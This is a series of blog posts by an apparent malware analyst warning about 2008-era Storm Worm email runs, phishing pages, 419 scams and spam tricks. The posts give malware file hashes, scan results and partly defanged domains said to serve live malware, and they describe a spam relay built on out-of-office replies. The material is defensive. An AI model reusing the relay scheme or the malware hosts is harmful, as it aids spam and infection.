Amazing Independence Day show
Stars and Strips forever
Well done 4th!
Celebrate the spirit of America
Happy Independence Day
Home of the Brave
Spectacular fireworks show
Long Live America
Amazing Independence Day salute

Here's a screenshot of one of the emails that I've received this morning:



Here's a screenshot of another one of the emails that I've received this morning [Can you spot the difference ;-)]:



If you are foolish enough to click on the link in the email, you'll end up on a page that looks like this:



And here is the source of the web page currently in use:



The more eagle-eyed of you may have noticed that the code includes an IFRAME which loads a PHP file called 'ind.php; this is what part of the page source code looks like for that file:



You may notice that this uses an obfuscated JavaScript routine, the end result, if you have JavaScript enabled in your web browser and your anti-malware doesn't detect this malcode, is that a dropper will be written to your hard disk. This is effectively a 'drive-by-download' as you don't have to click on anything on the webpage to download the file hidden in the JavaScript in 'ind.php'. The lower part of the code has been digitally munged by myself, as you don't need to see all of it.

At the time of posting this blog entry the detection of the offered 'fireworks.exe' file was still not complete, with only 20 out of 32 tested scanners identifying that this is a malicious file.

Furthermore the file being offered is not a static binary, as in my testing so far each request ends up serving a file which appears to be different, not in size but the MD5 hash is not the same. I'm not sure whether this is a case of server-side polymorphism or just a pool of pre-compiled executables from which one is chosen at random.

If I get any further useful data or news then I'll try and update this entry later today.

For those of you celebrating this particular holiday, I would like to wish you a very happy day and enjoy the real fireworks rather than the fake ones being offered in the latest Storm Worm run.

Oh by the way, I forgot to mention that this isn't the first time that fireworks have been used to get people to infect their own computers, anyone remember 'Happy99.exe' (also-known-as 'Ska')?

The Tax Man Giveth....

If you are anything like me you probably can't remember the last time the 'Tax Man' [those from HM Revenue and Customs] told you that you had paid too much tax and that he [or she] would like to return some money to you....Yeah right, like that is going to happen! I think I can honestly say that I have NEVER had any form of refund from them, ever, and I've been working for almost 30 years.

So, when I received the following e-mail [screenshot below] I was already rather sceptical:



The email looks quite believable, doesn't it? Even the link looks real.

If you are foolish/brave enough to click on the link, this is what you will see in your web browser:



Again, very believable, especially if you have no anti-phishing solutions in place.

If you are foolish/brave enough to fill in the requested data and then click on the link, this is what you will see in your web browser next:



Finally, if you are foolish/brave enough to fill in the requested financial data and then click on the link, this is what you will see in your web browser:



Yes, if you clicked on the final page you will be taken from the 'phishy' HMR&C site to the 'real' HMR&C site, none the wiser that you have been 'phished'. The final image [above] is the real HMR&C site.

Usual fare for the Phishers, they want your personal details so that they can steal money from your account or use the details to open new accounts or credit arrangements in your name, so when they default on the loan, you'll be the one being hassled or taken to court for non-payment.

Meanwhile your credit rating will nose-dive, and it will take you weeks, months or even years to recover from the effects. All because you were 'phooled by a phish'.

So, if you get an e-mail stating that you have a tax refund.....be warned as you may end up even more out of pocket than you would if you were dealing with the real HMR&C, at least they are up-front about it! So, to finish the second half of the line used for the title of this posting "The Tax Man Giveth [NOT] and the Phishers Fake it to Take it all!"

I'll Have a 419 With a Side Order of Malware, Please....

No this isn't about an order being placed at my local Chinese restaurant or takeaway; their menu item number don't go up that far, believe me I have checked ;-).

So for starters, let me show you a screenshot of an e-mail I received this morning:



Looks like a pretty typical 419 scam e-mail doesn't it? A little more terse than usual, I'll grant you, but still a 419 scam, hang on it has an attachment, most unusual! Here's a screenshot showing the attached file:



An executable file, very suspicious and most unusual for it to be attached to a 419 scam. I wonder what the Bad Guys and Girls from Lagos are up to now? I think a bit of testing and investigation is in order, don't you?

Some details on the executable file first:

FileName: 108 3386 8257.exe
FileDateTime: 26/06/2008 11:38:39
Filesize: 303842
MD5: 3e5480b34a38d2dc5e1f45f561c7d5f2
CRC32: F7A3CF76
File Type: PE Executable

Which is a WinRAR SFX [executable archive] and this contains the following files:

108 3386 8257.txt
gbt.exe
gbthk.dll
inst.dat
kw.dat
pk.bin
rinst.exe

So, let me extract the files, no not by running the RAR SFX file, as that would infect my system with the malware contained inside it.

Of these only one is a true executable file, this is:

FileName: rinst.exe
FileDateTime: 24/06/2007 21:08:18
Filesize: 19456
MD5: f3d0beef15eb987dbcec8e803bf6c89d
CRC32: 94F8865E
File Type: PE Executable

This file "rinst.exe" is packed using Armadillo and the executable itself appears to be written using Microsoft Visual C++.

This is the main installation file, and if you are foolish enough to run the attachment, all the enclosed files are dropped to "C:\WINDOWS\TEMP\RarSFX0" and then it proceeds to run "rinst.exe" to perform the install of the malcode; in this case it also tries to identify and kill any recognised anti-malware tools. Once installed it attempts to load the "108 3386 8257.txt" file which contains the following text:

MTCN CONTROL NUMBER 108 3386 8257
AMOUNT : $3,450USD
RECIEVER : JONATHAN NWEKE,LAGOS NIGERIA

The rest of the files appear to be obfuscated files that are part of the installation of a keylogger, so not only is this malware attempting to kill any security defences you have in place, it is also trying to record what you type, etc. Nasty!

So next time you receive a 419, have a closer look and see if the Bad Guys and Girls from Lagos have included an attachment to get you to infect your computer and steal your personal data. It seems that they have finally learned that this is now a multi-billion dollar business, and if they fail to adapt then they will either get left behind or other professional cyber-criminals will take their traditional business away from them.

If you want to know more about 419 scams and their genesis, then you can find more here.

Right, back to my analysis of this to find out what else it does...

Would You Rather Be A Mule [REDUX]?

How many of you out there have seen job offers [both part-time and full-time positions] that look like the following screenshots:








Tempted to apply, or do they seem too-good-to-be-true?

Well, they are too-good-to-be -true, all the screenshots of the e-mails are nothing more than an attempt to recruit staff to act as money launderers, also known as mules.

I've written about mules before on this blog, but I though it was time to revisit the area as the bad guys and girls have been very active in trying to recruit new mules just recently.

So, a quick recap

"We are not talking about four legged creatures that are half horse and half donkey….think more of drug couriers who are more usually referred to as Mules!

Now, in most cases Mules are those that either carry things for others [hence the use of the term] or act as laundering points, such as in organized crime syndicates, they do the dirty work of moving material from A to B and usually have little or no idea hat what they are doing is illegal. They may even be acting as a Mule under duress, such as blackmail, etc."

Next time you see a job advert on the web, in the local paper or receive a job offer via e-mail, stop and think is this really legit, or am I about to be turned into a mule, or as the song goes:

"Would you like to swing on a star
carry moonbeams home in a jar
and be better off than you are
or would you rather be a mule

A mule is an animal with long funny ears
he kicks up at anything he hears
His back is brawny but his brain is weak
he's just plain stupid with a stubborn streak
and by the way if you hate to go to school
You may grow up to be a mule..."

The full lyrics can be found here.

By all means swing on a star, but not if it means you grow up to be a mule...to fund the lifestyle, and end up broken, saddled with a criminal record, and end up corralled in jail with numerous other mules, while those that run the scams get away with turning the endless train of desperate people [including students] into yet more mules.

They're Back!!! Beijing Earthquake

Early this morning we started to see emails pushing a new variant of the so-called 'Storm Worm'. These are using a similar tactic to those that gave the malware authors their name, in this case it isn't real storms it is a fictional new earthquake in Beijing, China.

Here is a screenshot showing many of the subject lines seen so far for this new Storm Worm run:



Here is a screenshot of one of the e-mails I have received:



Most of them do not have the anti-virus scanning message at the bottom, I picked this one as I'm not sure whether this was added by one of the infected clients, or as part of the next wave, as some form of extra social-engineering ploy. It should also be noted that they have gone back to using real domain names for this run, instead of their more usual dotted IP addresses. According to F-Secure, these are all flast-fluxed.

Here's a screenshot of the website you would end up on if you clicked on the link:



The file offered is not a video, it is, not surprisingly an executable file, here are the details of a sample I downloaded earlier today.

FileName: beijing.exe
FileDateTime: 19/06/2008 12:56:05
Filesize: 83608
MD5: 3752f1a45c897471369f5f17dc42c8ee
CRC32: DA97A2FB
File Type: PE Executable

Here are the scan results of the currently offered file 'beijing.exe' as scanned by over 30 up-to-date malware scanners:

@Proventia-VPS NOT DETECTED
AntiVir Worm/Zhelatin.zc
Avast! Win32:TDrop [Drp]
AVG NOT DETECTED
BitDefender Trojan.Peed.JLV
CA-AV NOT DETECTED
CA-AV (BETA) NOT DETECTED
ClamAV NOT DETECTED
Command NOT DETECTED
Dr Web NOT DETECTED
eSafe File [100] (suspicious)
Ewido NOT DETECTED
F-Prot NOT DETECTED
F-Secure NOT DETECTED
F-Secure (BETA) NOT DETECTED
Fortinet NOT DETECTED
Fortinet (BETA) NOT DETECTED
Ikarus Email-Worm.Win32.Zhelatin.zy
Kaspersky NOT DETECTED
McAfee NOT DETECTED
McAfee (BETA) NOT DETECTED
Microsoft NOT DETECTED
Nod32 Win32/Nuwar worm
Norman NOT DETECTED
Panda NOT DETECTED
Panda (BETA) NOT DETECTED
QuickHeal NOT DETECTED
Rising NOT DETECTED
Sophos W32/Nuwar-E
Sunbelt NOT DETECTED
Symantec NOT DETECTED
Symantec (BETA) NOT DETECTED
Trend Micro NOT DETECTED
Trend Micro (BETA) NOT DETECTED
VBA32 NOT DETECTED
VirusBuster NOT DETECTED
WebWasher Worm.Zhelatin.zc
YY_A-Squared NOT DETECTED
YY_Spybot Worldsecurityonline.FakeAlert,,Executable

It should also be noted that the Storm-Worm gang are trying something new with this new variant, they are using Alternate Data Streams [ADS] , in this case there is an ADS called Zone.Identifier, which is a text file that contains:

[ZoneTransfer]
ZoneId=3

I'm not quite sure what they are using this for at the moment, maybe some form of tracking data?

UPDATE: This may actually be nothing to do with the Storm Worm gang after all [the ADS part, that is], as it seems that this may be a new 'feature' of Firefox 3.x instead, sneaky!

So what do you do if you receive such an e-mail? Simply delete it, do not click on the link and definitely do not download and launch the file that is offered, and finally update your anti-virus at least once a day, as otherwise you will become a victim. Hopefully most anti-virus products will be able to detect this within the next 24 hours.

Every Little Helps...

Is the catchphrase for Tesco [a very well known UK supermarket] who sent me an e-mail today informing me that I "have added an additional email address to my account", see below for the full e-mail:



The email address it was sent by was "customer@tesco.com" which is also the return address in the raw e-mail headers too. So, let's see where we end up when we click on one of the four links in the e-mail itself, shall we?

Here's a screenshot of the website that we end up on [using Opera 9.50].....Hmmmm...Tesco.com [according to the tab text]. Looks like the real thing, but is it?



How many of you spotted the red warning in the browsers address bar? It reads [!Fraud site]*. Bit of a giveaway, and also when I clicked on the link in the e-mail it actually goes to a dotted IP address, before being redirected [probably some form of click fraud] to the bogus Tesco.com site shown in the screenshot above. Yes, it is a Phishing site, not the real Tesco.com at all!

So, what is the site and what is it trying to achieve?

Well, this appears to be a Phishing scam, but instead of being targeted at a bank or other financial organisation, or Paypal, eBay, eGold, etc. it is targeting customers of a supermarket instead. This is the first time I've seen a supermarket being the target of a Phishing scam run, most unusual!

Not sure why the bad guys and girls are targeting Tesco customers, unless the stolen customer login details are just a way for them to gain access to any stored credit/debit card details on the Tesco.com account? Maybe they are just hungry ;-)

So, is this a new trend, can we expect similar Phishing scams for Sainsbury's, Waiterose, Marks and Spencer's and Morrisons? Unfortunately, I expect so, so please be very careful and if you have the option on any such service do NOT store your credit/debit card details, it may make shopping faster, but it also makes identity theft easier too.....as Tesco states "Every Little Helps", just don't let it be true for the bad guys and girls allowing them to gain access to your personal information and credit/debit card details.

* This is a new feature in the latest version of Opera.

The FBI Have Contacted Me!

I received the following e-mail [screenshot below] this morning which says it has come from the FBI, not only that, it states that it was sent by FBI Director Robert S.Mueller the Third of the Anti-terrorist and Monetary Crimes Division and if I don't respond and/or supply the requested information that I'll be charged!





It goes on to say that I have $10,500,000.00 being wired to me via a Secured Diplomatic Transit Account [S.D.T.A] and I need to prove that I have the required paperwork, including a Diplomatic Immunity Seal of Transfer [DIST] and an FBI Identification Record (aka a Rap Sheet or Criminal History Record) to prove I am who I claim to be and that I'm not a terrorist or drugs dealer. If I can supply these proofs, then the money is all mine!

OK, how many of you out there reading this would go along with this? Hands up, so I can count ;-)

Now, how many of the rest of you smell something fishy? Well, it isn't a Phish at all, it is just another new version of the so-called 419 scam.

The twist here, is that the Boys and Girls from Lagos [or almost anywhere else in the World now] are using fear as a new social engineering tactic to get you to part with personal data which they will then either mis-use or sell to others.

If you somehow, miraculously come up with the requested proofs, then guess what, you won't get any money at all, because there is no money in the first place, and the e-mail isn't from the FBI [or anyone in law-enforcement], surprise! ;-)

Whatever you do don't fall for this scam [or any of it's relations], it relies on what the Lagos boys call Wad [rich, greedy people]. They also use a less polite name for the people they dupe; Mgbada*.

To the Boys and Girls from Lagos [the 419ers that run these scams], it is a business, some say it should be considered an African cottage industry, however they want to try and justify it, it is still a crime, no more, no less.

Other unusual examples of 419s I've covered include

• Scam Victims Compensation Payments


• Barclays FIVE MILLION US Dollar Transfer


• A Google Product Too Far?


• Secret Intelligence Service SCAM ALERT!! E-mail

Lots of other examples have also been covered oer the years on this blog, and I have written several articles for Virus Bulletin on 419s, which can be found here.

* If anyone can tell me what this means in English, then please e-mail me, thanks.

EICAR 2008 Conference Paper Now Available

This is a quick update on my posting from yesterday, and to announce that the full paper for the EICAR 2008 conference which was held earlier this week is now available for download as a PDF [Adobe Acrobat] file.

To refresh you memories,here is the abstract from the paper, entitled "Where To Now: Detecting The Unknown":

The increasing speed of new malware strains being written and released means that security professionals are more likely than ever before to see new malware.

This means new malware which is not detected by the anti-malware solutions they have deployed in their infrastructure, be it workstation, server, PDA or at the gateway.

Imagine this scenario: An end-user calls the helpdesk and reports that their system is running very sluggishly when it wasn't a week ago and that they can't access the Windows 'Task Manager' or open a command prompt any more.

Is this caused by malware or is it a 'user' problem? The virus scanner is right up to date and active, and it says the system is clean, the personal firewall is active too. Where do you go from here? Investigate or rebuild the box?

How can you tell if the machine is clean or infected by a new malware, with a reasonable level of confidence for your conclusion?

This paper will look at what tricks, tools and techniques you can use to help establish the true state of the 'suspect' system. It will focus on a step by step approach of what tools to use, what to look for and what to do with any suspicious files. It will also discuss the use of forensic tools in such a scenario, as a last port of call.

The paper will draw on real scenarios where new [undetected] malware has been responsible for 'odd' system or network behaviour.

The paper can be downloaded via the following links:

• http://momusings.com/papers/EICAR2008-Where-To-Now-1.01.pdf


• http://momusings.co.uk/Documents/EICAR2008-Where-To-Now-1.01.pdf

As usual all feedback is most welcome.

No, I [Still] Haven't Fallen Off The Edge Of The World....

Or been kidnapped by aliens, gone over to the dark side or gone down with a virus [or should that now be malcode?].

It seems that about this time, every year, I end up writing a post like this, so here is this years version. ;-)

Sorry for the lack of blog entries over the last month or so, but I've been writing a conference paper for the EICAR international conference which is, as I write this, being held in Laval, France.

So, am I writing this blog entry from there? No, unfortunately not, let me explain...

Why am I not presenting my paper at EICAR 2008 in Laval, France? Why am I not there today?

Well, the decision was made that because we [the new team/service I'm part of] was in the middle of a major analysis of new malcode, and this was a very high priority. It was decided at a commercial level that it would be better if I were available at a moments notice if new samples were found that required immediate analysis. If I were in Laval, France I would be unable to work on live malcode and keep in contact.

So, I'd like to apologise once more to EICAR that I was unable to attend and present my paper at the conference. Hopefully, if the team I'm now part of is expanded this won't have to happen again. Anyone that attended EICAR will have still seen my paper presented, but by Eric Filiol [who does not work for IBM or ISS] instead. This was the best solution we could come up with at the last moment.

The paper will be made available later this week at the following locations*:

• http://momusings.com/papers


• http://momusings.co.uk/publications.aspx

Writing the paper for EICAR is only one of the reasons for my lack of posting, other changes have been afoot!

Firstly, I have moved to a new company, well sort of, I now work for Internet Security Systems, who as some of you may know were acquired by IBM a while ago. So, I now work for ISS, which is owned by IBM. However, my role has changed as I now work in the X-Force Professional Security Services section as a Malware Analyst and Consultant.

So, what does this new role involve?

The main part of it is malware analysis and reverse-engineering. So, in some ways I have stepped back in time to the sort of work I used to do when I wrote my own anti-virus detection and remediation tools [whilst I was working for another company]. However, the game has changed quite a bit since then; luckily my skills are not that rusty, so I have managed to get back up to speed very quickly. Other skills I have picked up and honed over the years will probably also be required for other parts of my new role; more on that another time.

However, that is not all that has kept me from posting recently, other things include:

• Lecturing at the University of Warwick on malware and internet security later this month, so my slides need to be updated and tweaked before then.


• Writing and submitting abstracts for this years Virus Bulletin conference to be held in Ottawa, Canada this year.


• Building systems and finding/creating tools to help in the analysis of new samples, they just keep coming!


• Working very long hours on malcode analysis.

Normal, [once or twice a week postings] service will be resumed as soon as I can find that elusive 25th hour in the day, or I decide to give up trying to get any sleep at all!



* All my published papers and articles can be found at those web addresses.

Don't 'Fool' For It...

Normally I do my own April Fools blog posting, using some bogus malware, anti-malware or other computer related bit of nonsense for a bit of fun, and hopefully you find them funny, or at least interesting?

However, this year I didn't need to bother, as the Bad Guys and Girls have their own; trouble is, it isn't a joke, and it certainly isn't funny!

It seems that the so-called 'Storm Worm Gang' are back playing the fool again and couldn't resist the opportunity to try and get you to infect your computer using the guise of a April Fools e-card. This new wave started late last night/early this morning [depending where you are in the world]:

The subjects of the e-mails I've seen so far include:

Surprise!
Happy April Fools!
Happy All Fool's Day
Gotcha! April Fool!
Gotcha! All Fool!
I am a Fool for your Love
Today You Can Officially Act Foolish
Join the Laugh-A-Lot
Surprise! The joke's on you

The body of all the e-mails seen so far contain a single line of text and a URL [the usual dotted IP sort, e.g. http://100.123.12.1]

Here's a screenshot of one of the emails that I've received this morning:



If you are foolish enough to click on the link in the email, you'll end up on a page that looks like this:



After 5 seconds you'll see a download dialogue box, like this:



And here is the source of the web page currently in use:



However you spend the day, whatever jokes you play, or end up the victim of, don't 'Fool' for this one, as otherwise you computer will get infected and the Bad Guys and Girls will have the last laugh again, at you expense!.

At the time of posting this blog entry the detection of the offered 'funny.exe' file was rather poor, with less than half of 32 tested scanners identifying that this is a malicious file. This is the default file and is automatically offered for download [within 5 seconds of the page rendering].

You may have noticed that two other filenames appear in the HTML source; these are:

kickme.exe
foolsday.exe

If you click on the image, you get kickme.exe, and if you click on "click here" you get foolsday.exe. instead.

If I get any further useful data or news then I'll try and update this entry later today or tomorrow.

Whilst I was browsing the web looking for a good basis for an April Fools blog posting, I found these:

• Unusual banking trojan found today


• RAPIL - a slap in the face for hackers and virus writers

Please let me know if you spot any more, thanks!

3D Screensaver E-mails?

This morning I started to receive e-mails offering me screensavers. I immediately smelt a rat, well at least a malware author, anyway! ;-)

So, I took a look at it in more details, here's a screenshot of one of the e-mails:



I clicked on the link to see where I'd end up, and you can see what I found, below:



Looks like a very professional and polished website offering 3D Screensavers; very believable, isn't it?

So, I clicked on one of the links offered and I ended up here:



Still very believable, so I proceeded to download a copy of the screensaver offered, so that I could analyse it [you didn't think I was actually going to install it, did you? ;-)].

Will you be surprised to learn that the results of my analysis showed that this wasn't a screensaver at all, it was a piece of malware. I then proceeded to download several other samples, from the other selections offered, and the resulting files, although having different names, were all the same size [18,944 bytes], had the same MD5 hash value [which means they are all effectively identical internally], and were not being detected by a number of anti-malware tools.

At the time of posting this the files I downloaded from the site were named "Screensaver-66713.scr", "Screensaver-8719.scr" and "Screensaver-83580.scr", this of course may change, and there are certainly others with different filenames being offered.

If you see an e-mail like the one shown above, then simply delete it, as otherwise you will infect your computer, rather than save it's screen.

Hopefully by the end of today most anti-malware vendors should have updated their products to detect it.

So, in those immortal words, "Be careful out there...."

Stealthed Spam, Redux II!

The spammers are upping the stakes in the stealthed spam arena again. This entry will cover a stealthed spam I received this morning, but before that let me suggest that if you don't know what I am talking about, then you should take a look at my previous blog entries covering this area. These are [30th January 2008] and [17th October 2007]. This will also allow you to follow the development of this as a spamming technique.

So, now if you know what I mean by stealth and stealth spam, let me show you the latest example I have seen, just today, in fact:

The body of the e-mail would have you believe that it is from 'Irwin Bank and Trust':



With the above example, all the URLS [web-links] except one, used in the e-mail point to the real Banks site! All the text is probably taken from the real Banks website. This e-mail passes the tests that most of us use to decide if something is spam or not, in other words it pretty easily passes the 'Eyeball' test fairly easily as it looks pretty genuine. The only missing pieces are any remote graphics, which most e-mail programs will not show, at least not by default.

So, what does it look like when I enable 'allow remote images' in the e-mail program?

It looks like this [yes, it is the same e-mail]:



Now it fails the 'Eyeball' test with ease.

Although, the stealthed e-mail shown above is pretty convincing, it isn't perfect as the e-mail address it shows as the from address [admin@viagra.com] and the subject used [RE:February 83% OFF] are not consistent with the rest of the e-mail, and are obviously spammy. So, the spammers need to sort these problems out to create the perfect stealthed spam.

Why do I call this 'Stealthed Spam'? Well, simply because the spam component is hidden and not in plain view, at first.

As they say "Keep 'em peeled!", which means keep your eyes open and stay alert. Or, as other might say, "don't believe everything you see or read", it may be a clever fake.

If you see any other interesting new tricks/techniques or file formats being used by spammers then please feel free to send me the details or post the information as a comment. Thanks!

Out of Office Notifications Are...

An accident waiting to happen!

In fact a number of these accidents have already happened. But I'm getting ahead of myself. So, why do I think that they are inherently bad?

Personally, I hate out of office notifications, not because it means that I can't get a reply from the person I sent an e-mail too in the first place, but because they can be misused by not just the person who is 'Out of the Office' but also by the 'Bad Guys and Girls'. Let me explain in more detail, what I mean...

1. Too Much Information
Often when people enable 'Out of Office' they offer too much information; such as when they are going and coming back, and where they are going to. They also often include a second person's details to contact in their absence; including their full e-mail address. This is then often enabled for all incoming e-mail to their e-mail address, which means that not only internal [company/organisation] colleagues are informed, but also, in many cases anyone on the internet that sends them e-mail. The next two points explain in more details why this is a 'bad' thing.

2. Confirmation that your e-mail address exists
As mentioned above, if you enable your 'Out of Office' notification to send an automatic response to all e-mail that is received, you are assisting spammers, scammers and malware authors by confirming that the e-mail address is in use [that makes it worth more]. If you also include another persons details to contact while you are away, then the 'Bad Guys and Girls' can also harvest that to either sell on for profit to others, misuse it themselves, or often both. The end result is more spam, scams and malware arriving in yours and anyone else's inbox that you kindly supplied in your 'Out of Office' notification, I'm sure that they will be quick to thank you for all the extra 'crud' they are now receiving ;-)

3. Physical and Cyber attacks while you are 'away'.
If you are unwise enough to indicate you are on holiday or just out of the country where you normally reside, then the 'Bad Guys and Girls' can do a number of things whilst you are not at home. If they have enough data on you, then you could come back to find your house burgled, full of squatters, vandalised or even worse.

If they don't have access to that level of information then can hack into your personal webspace, social networking and other web sites you may use. They could also perform a 'Joe Job' or a 'DDoS' to discredit you or damage your business or reputation. While you are away they may use your stolen identity to take out loans, credit cards and even mortgages in your name. If they already have some of your financial data, such as bank account or credit card data, you could suddenly find your bank account empty or unathorised charges [and ATM withdrawals] on your debit or credit cards.

In all these cases listed above, this is only likely to happen if you have come to their attention; such as being a thorn in their side, or making life difficult for them, or someone else is willing to pay for the information and/or attacks to take place.

If you don't believe that these things happen, then I can assure you that many of the cyber attacks happen to many of us who work in computer security, especially those that are widely published or who work for anti-malware companies or in law-enforcement.

Figure 1: Too Much Information is an Invitation for Trouble!

4. Bounced Spam
This is the latest way that 'Out of Office' notifications can be mis-used and it affects all of us who are already on spammers/scammers and malware authors lists (or soon will be).

Here is the scenario:
The Bad Guys or Girls sign up for a free webmail account, at say, Google, Yahoo, Live, etc. and then enable the 'Out of Office' feature. They then place the spam message they want to distribute in the 'Out of Office' e-mail body.

Next, the spammer sends this new webmail account with the enabled 'Out of Office' feature, lots of e-mails using spoofed 'From:' addresses so that the 'Out of Office' reply will be sent to the intended victim [the spoofed From: address].

Why do this? Well, e-mail sent from this booby-trapped spamming webmail account will contain anti-spam header information, such as DKIM, DomainKey, Sender ID or any of the other similar systems, which means that the mail server that deals with the intended victims email will be more likely to let the spam through as it has come from a trusted source.

This is now easier for the spammers to do, as the CAPTCHA systems used by Yahoo and Googlemail have been cracked; so that they can now automate the creation of these 'trusted' 'Out of Office' spam relays.

Figure 2: Out of Office Spam Setup

So, next time you go to enable your 'Out of Office' feature, think carefully about what information you provide, and if you can do not enable the respond to internet address option, as you may live to regret it!

A Right Royal Grant?

Wow, according to the e-mail I received today I have been awarded a grant of half-a-million pounds [£500,000.00], not just from any old society or company, but from one calling itself 'Queen Elizabeth's Foundation'!

I'm honoured, that I have personally come to the attention of our countries ruling monarch, and what's more she feels that I deserve half-a-million in cash with her head on it all...

Here's a screenshot of the e-mail, so that you can see it for yourself, and bask in my glory:



OK, yes I'm not really being serious, or getting too big for my boots, or thinking that I'm now above you all ;-) I know it is a scam and I'm just playing along.

So, let me start by checking out if the domain that the email claims to be sent from actually has a website:



Nope, no website, most odd! OK, so let me know check to see who the domain is registered with and to whom:



If I didn't already know that this was a 419 scam, then I would by now, so let me dig deeper. Next, let me check out the phone numbers, they look real and they are, but they are not registered to any charity or person, they are so-called 'personal' numbers being offered for FREE by the following company:



So, what do we know so far? There is no such society or organisation, the telephone numbers given are real but suspect, they have no website and the domain isn't even registered [so how could they send e-mail from it?], and finally they want me to reply to a different e-mail address, and they can't make their mind up as to who I should be replying to, is it:

Rooney James or Williams Anderson?

To get to the bottom of the mystery of where the e-mail was sent from, I took a quick peek at the raw headers, and what did I find? I found that the e-mail was actually sent via the webmail service of the company shown in the final screenshot, below:



Yes, they sent the e-mail using a webmail service based in Hawaii, for the United Kingdom monarch who's name is used for an organisation that doesn't exist, doesn't have a website or own a domain at all, and they want me to reply to an email account hosted on Microsoft Live, just so that they can send me half-a-million quid!

So, do you smell a rat now, or would you send them the data they ask for?

Just to be crystal clear about this: There is no money, as usual, this is a scam which has been around in one format or another for many years, all that happens if you get caught up with these scammers is that you will lose money, not gain any.

Just because they use the name of the Queen of the United Kingdom, and names of well known real organisations such as UNICEF, doesn't mean that this is real [even if the money actually existed, which it doesn't]. This is just another twist in 'The Game' that is collectively known as 419 or Advance-Fee-Fraud.

Sorry, Your Majesty, but I'm going to have to turn down your kind offer...

FREE Greetings FOR YOU !!!

Looks like a busy day for me today, just what I need, not!

Here's a screenshot of another tempting* email that I've received this afternoon:



If you are foolish enough to click on the link in the email, you'll end up being offered a file called 'greeting.exe', this file appears to be hosted on the free web-hosting service called ZeroCatch. Here's a screenshot of the default page for the sub-domain hosting the file. As you can see the malware author couldn't even be bothered to put a basic page together:



So, I hear you all ask, do you get FREE Greetings, as promised? Nope, all you'll get is an infected PC for your trouble, although it will be FREE! ;-)

At the time of posting this blog entry the detection of the offered 'greeting.exe' file was very poor, with only 6 out of 32 tested scanners identifying that this is a malicious file.

Furthermore the file being offered appears to be a static binary, as in my testing so far all samples downloaded are the same size and produce the same MD5.

[*] Only really tempting if I had a lobotomy or suffered other severe head or brain trauma which seriously affected my common-sense.

Another Stormy Valentine's Day...

...Coming To A PC Near You, Soon!

I hope that you are all ready for a safe and pleasant, if not wonderful, Valentines Day on Thursday?

It seems that the so-called 'Storm Worm Gang' are back playing cupid again and couldn't resist the opportunity to try and get you to infect your computer again using the guise of a valentine e-card, again. The latest wave of these started early this morning:

The subjects of the e-mails I've seen so far include:

Blind Love
Heart pump
Love Rose
Phone Love
With All My Love
Valentine Friends
Happy Valentine's day!
The love Train
You're Super Sweet
Me & You

The body of all the e-mails seen so far contain a single line of text and a URL [the usual dotted IP sort, e.g. http://100.123.12.1], here are just a small selection of the text I've seen used so far:

A Hearty Wish
Love You
My Heart
Rockin' Valentine
Smiley Kiss
You Stay In My Heart
Valentine Friends

Here's a screenshot of one of the email that I've received this morning:



If you are foolish enough to click on the link in the email, you'll end up on a page that looks like one of these [these are not all the known permutations], the graphic shown on the website is randomly chosen from a pool of at least 6:







And here is the source of the web page currently in use:



However you spend the day, whatever you do for the 'love-of-your-life', don't become part of the collateral damage of the annual 'Valentine's Day [Malware] Massacre'.

If I see anymore 'bogus' Valentine's Day e-mails, I'll try and post details here when I can. Also, if you see any that I haven't yet posted about, then please let me know.

Hopefully, between us we can try and keep the annual massacre down to a mere scuffle! ;-)

At the time of posting this blog entry the detection of the offered 'valentine.exe' file was very poor, with only 4 out of 32 tested scanners identifying that this is a malicious file.

Furthermore the file being offered is not a static binary, as in my testing so far each request ends up serving a file which appears to be different in size, I'm not sure whether this is a case of server-side polymorphism or just a pool of pre-compiled executables from which one is chosen at random.

If I get any further useful data or news then I'll try and update this entry later today or tomorrow.

UPDATE: The URLs [Web links] included in the e-mail may also now be domain names containing the word 'moon' which I will omit from the web links I have seen so far, see below:

• [the-m-word]starfood.com
• destroythe[the-m-word].com

I suspect that others will appear shortly, please do not go to those domains as they contain live malware, you have been warned!

Presenting at The University of Loughborough...

Once more I have been asked to present at a conference, this time it is one being held at the University of Loughborough in Leicestershire.

So, this is another one for me to add to my collection of Universities I've presented/lectured at. These include: The Open University and Warwick University.

This presentation is on Rootkits, and is an updated version of the one I gave at the Virus Bulletin 2006 conference in Montreal, Canada. If you are interested in finding out more about rootkits, then the paper can be found here: http://momusings.com/papers

As usual you will not only find the Rootkit paper there, but also all my published papers and magazine articles too.

I'm hoping that the weather doesn't cause any issues with the trains, and that the rails have been repaired after this mornings crash on the same line!

For those of you that are interested, here is a link to the UCISA website covering the details and agenda for the event.

The travel time from where I live is about 3.5 hours each way, so I will probably leave home about 6AM and won't get back until around 9PM, still I might get a chance to write some of my EICAR 2008 paper, or at least some abstracts for the Virus Bulletin 2008 conference.

Stealthed Spam, Redux!

I originally covered this back in October of 2007, but things have, as usual, recently repeated themselves, the spammers that is. This time the stealthed spam is different as new approaches and techniques have been used. However, a quick recap of what I mean by stealth.

"Here's an interesting trick that the spammers are increasingly using to defeat not only software and hardware anti-spam defences but also "wetware" anti-spam defences; wetware is the geek/nerd term for you, dear reader, the interface between the chair and the keyboard. ;-)

Stealth is not a new idea, computer viruses and other malware have been using technique to hide since the very beginning of the problem on IBM and compatible PCs. In fact the very first virus on this platform 'Brain' used stealth. Also, most of you are aware that stealth is widely used by the military, not only to make warplanes invisible [or almost] to radar and other tracking technologies, but also warships."

So, now you know what I mean by stealth, so what does stealth spam look like, well guess what, you can't see it at first as it is stealthed [hidden], here's some recent examples so you can see what I mean:

The first one claims to be from 'Media Inc.':



The second one claims to be from 'Windows Live Hotmail':



The third and final one claims to be from 'A Credit-Card Company':



With all of the above examples, all the URLS [web-links] used in the e-mail point to the spammy site and the To and From e-mail address used tends to be the same, that being yours! All the text is probably taken from real newletters/e-mails/websites. These e-mails pass the tests that most of us use to decide if something is spam or not, in other words they pass the 'Eyeball' test fairly easily as they look like genuine e-mails from real companies. The only missing pieces are any remote graphics, which most e-mail programs will not show, at least not by default.

So, what do they look like when I enable 'allow remote images' in the e-mail program?

They look like this:







Yes, you aren't seeing double, the second and third example produce the same result when viewed in an HTML capable e-mail reader or web browser.

Now they all fail the 'Eyeball' test with ease.

Why do I call these 'Stealthed Spam'? Well, simply because the spam component is hidden and not in plain view.

The final screenshot shows part of the HTML source of the final example shown above when it is only showing the image:



You can clearly see the other HTML, which doesn't get shown when rendered in a browser or a HTML e-mail reader.

As they say "Keep 'em peeled!", which means keep your eyes open and stay alert. Or, as other might say, "don't believe everything you see or read", it may be a clever fake.

